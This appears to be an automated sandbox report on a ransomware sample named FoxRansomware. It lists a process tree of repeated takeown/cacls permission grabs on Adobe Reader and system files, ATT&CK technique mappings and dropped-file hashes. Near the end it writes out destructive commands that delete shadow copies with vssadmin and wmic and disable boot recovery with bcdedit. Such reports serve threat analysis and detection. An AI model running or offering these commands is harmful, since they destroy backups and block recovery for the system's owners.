C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:2136
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:3776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:1872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3736
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:2624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:2156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Modifies file permissions
PID:1048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:816
-
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 1116
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 4004
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"" | PID 3156
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C | PID 3100
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" | PID 2672
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 4064
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "resource.xml" -nobanner | PID 1624
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2428
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"" | PID 2696
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C | PID 3264
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" | PID 2976
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "AUMProduct.cer" -nobanner | PID 3664
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "AUMProduct.cer" -nobanner | PID 3688
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3900
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"" | PID 2192
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C | PID 2432
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" | PID 2780
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "email_all.gif" -nobanner | PID 2352
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "email_all.gif" -nobanner | PID 1592
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1496
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"" | PID 3248
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C | PID 1548
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" | PID 2464
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "open_original_form.gif" -nobanner | PID 3960
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "open_original_form.gif" -nobanner | PID 2648
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3560
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"" | PID 2112
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C | PID 4056
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" | PID 2356
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "rss.gif" -nobanner | PID 3412
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "rss.gif" -nobanner | PID 3440
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1684
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"" | PID 1076
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C | PID 2508
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" | PID 2564
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "turnOffNotificationInTray.gif" -nobanner | PID 1844
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "turnOffNotificationInTray.gif" -nobanner | PID 2108
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3696
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"" | PID 2476
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C | PID 2536
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" | PID 3364
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CourierStd-Oblique.otf" -nobanner | PID 2772
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "CourierStd-Oblique.otf" -nobanner | PID 2500
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3816
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"" | PID 3632
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C | PID 3004
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" | PID 892
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SY______.PFM" -nobanner | PID 2716
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "SY______.PFM" -nobanner | PID 784
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1928
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"" | PID 3644
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C | PID 2584
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" | PID 2948
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner | PID 4008
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner | PID 2640
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3812
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"" | PID 3376
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C | PID 3296
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" | PID 3384
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "can129.hsp" -nobanner | PID 3524
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "can129.hsp" -nobanner | PID 3436
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3320
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"" | PID 2552
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C | PID 1380
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" | PID 1660
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "icudt26l.dat" -nobanner | PID 2024
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "icudt26l.dat" -nobanner | PID 1780
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1108
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"" | PID 3916
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C | PID 212
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" | PID 3192
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ROMANIAN.TXT" -nobanner | PID 220
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "ROMANIAN.TXT" -nobanner | PID 3940
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3720
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"" | PID 3016
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C | PID 3068
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" | PID 3148
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1258.TXT" -nobanner | PID 756
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "CP1258.TXT" -nobanner | PID 3584
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1748
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"" | PID 3380
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C | PID 3120
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" | PID 3888
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "background.png" -nobanner | PID 2820
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "background.png" -nobanner | PID 2480
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2924
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"" | PID 4076
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C | PID 2468
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" | PID 3596
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tasks.xml" -nobanner | PID 3588
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "tasks.xml" -nobanner | PID 1032
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1632
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"" | PID 4000
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C | PID 3304
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" | PID 1368
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "qmgr0.dat" -nobanner | PID 3548
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "qmgr0.dat" -nobanner | PID 2052
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3768
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"" | PID 1784
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C | PID 2828
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" | PID 2236
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "license.html" -nobanner | PID 2944
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "license.html" -nobanner | PID 1808
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3932
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"" | PID 3080
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C | PID 3024
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" | PID 3020
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "add_reviewer.gif" -nobanner | PID 968
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "add_reviewer.gif" -nobanner | PID 1524
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3340
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"" | PID 2280
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C | PID 2512
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" | PID 3540
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "forms_received.gif" -nobanner | PID 2000
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "forms_received.gif" -nobanner | PID 3656
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3928
  C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"" | PID 2372
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C | PID 3324
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" | PID 2932
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "reviews_super.gif" -nobanner | PID 2004
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "reviews_super.gif" -nobanner | PID 3776
C:\Windows\system32\taskeng.exe | taskeng.exe {4086F10C-B1D5-461D-83C7-6680A44A8101} S-1-5-21-778096762-2241304387-192235952-1000:AYFLYVMK\Admin:Interactive:[1] | PID 2704
  C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\dLETBaeG.bat" | PID 4076
    C:\Windows\system32\vssadmin.exe | vssadmin Delete Shadows /All /Quiet | PID 1572
      - Interacts with shadow copies
    C:\Windows\System32\Wbem\WMIC.exe | wmic SHADOWCOPY DELETE | PID 2488
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\bcdedit.exe | bcdedit /set {default} recoveryenabled No | PID 1924
      - Modifies boot configuration data using bcdedit
    C:\Windows\system32\bcdedit.exe | bcdedit /set {default} bootstatuspolicy ignoreallfailures | PID 2632
      - Modifies boot configuration data using bcdedit
    C:\Windows\system32\schtasks.exe | SCHTASKS /Delete /TN DSHCA /F | PID 1404
C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | PID 3744
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Indicator Removal (2)
  - File Deletion (2)
- Modify Registry (2)
Downloads
- Filesize: 8KB
  MD5: 5309fe57828185ee0144f8c7a6dac995
  SHA1: 4557579cb9c798de9f401cce7d0d212791a65212
  SHA256: 708f05bd3be081167fc0b742b93cc8c191e832d138ce8f2573a733be24f93c04
  SHA512: 5325679ad76a2097dbe6a1d5e22ef23c8a086160b3a7d58be4568d55413a0dff41c93565355d87b2ebbc8c2c86667a7c415445314770add4222a60b2c9726ecd
- Filesize: 221KB
  MD5: 3026bc2448763d5a9862d864b97288ff
  SHA1: 7d93a18713ece2e7b93e453739ffd7ad0c646e9e
  SHA256: 7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
  SHA512: d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
- Filesize: 181KB
  MD5: 2f5b509929165fc13ceab9393c3b911d
  SHA1: b016316132a6a277c5d8a4d7f3d6e2c769984052
  SHA256: 0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
  SHA512: c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
- Filesize: 197B
  MD5: 19de8a96e95d50dd8c00dc64eccf917a
  SHA1: a40521e82e86ff52aa497171464ebfa8ae699836
  SHA256: 4ce269751e45e3a61b0ccd05a038634e4b385eb5192c78f9e2aab1e3757e5809
  SHA512: 4f36012bd9b7a6a759e8564dba104b57ec0bf8ff9431de1d90870af00994546ce4dd5778a1376bcc55f5d11ab96bbf7563c7b7764b7a35f16bc00ac6500213af
- Filesize: 273B
  MD5: d5fbfe6590e17a79ec37b82145bbf7f0
  SHA1: 5c8878b4bc17dfcd5d14176f7bf2ee99c03816eb
  SHA256: a8b60a302f6fd05d26ad4c5af5dd96738782b8b42cf546107fdae81608518aac
  SHA512: 408b0f0e06260b8c2ccab996d08a6da988db22521cffa11d7de5e1b19aa6a8cc6cc34e16ddb2eac2e5648b18d8855b9726c1e6b4976ed9bfccaba095dd192055
- Filesize: 1KB
  MD5: 4a6da1c226d8b0baecf7d888e7947685
  SHA1: d76d75fb425bc5e32849d526f7e3499643d0e5ca
  SHA256: e2a0df1736e5ffc75bbd8006cdda45eb3c9d1d536be03f52412fe0a496b53706
  SHA512: 767355c7adf6322dfcfb0893627ddfe1b14ce7cc285d7b5a824045f16c9431f5d24823d4512f6d78d71f84aaae12e0fbe6841994e6583e6bb91bb58641e1b4ce
- Filesize: 2KB
  MD5: c9496997525cff695f3d6f3943f2c7b6
  SHA1: f549d919deefa68c8166bd7a26ebc47d40bd7db6
  SHA256: 61c4cd403170e5670978de94208e91cce0d746e6a5802cbbe83df7b1b0d5481b
  SHA512: 2e9ceba83714e70e6ce5ac0f4539b7625755f931cb297cb2b1c1bf488b09ffaab4c451d3a312bc9eb2a33859f5b4818bc07a3bbd1d6dad966c7d899e6fb0d36c
- Filesize: 2KB
  MD5: f56a37448a8b51beeca1117fee9b6b0c
  SHA1: 2a805ee51b8d8b4aa3042cdbf6d7e2f7f87e02db
  SHA256: 2f50b534f499355f2ca63d1ebf6ac81f0a3af6a397ebfa582293ffdf5ca36e28
  SHA512: c31105694888f7ac5c45b93765de7c7736515cf5f7f0d5dc11efa1984360d803527ad512adb8269333548c5be65805ee9c3d2c0c44d37789e45cebc4b21dbe8e
- Filesize: 3KB
  MD5: 27ed9b2eb136390d31f7bcebbe9afa29
  SHA1: 135ef2bfd0fa3bccee7ab1149af861133ca7ab90
  SHA256: 307a5afe2dfe6d139c3c366cfc1989b36d5f426e8baa4e8e16b4b9908c92eee2
  SHA512: e175c6e7543055906d8adba5fbe653b7e2174ef57aea3debd00bc8e0cbae11c894f216c64ebc3a1dba29786001f717cbdb5af9a1e6d84129ca9dcfe1c1a039ed
- Filesize: 24KB
  MD5: 8f541954992930c94b2e3b923f0ffd8f
  SHA1: 1638613e45aef845ae78d90d44026fa3f535980a
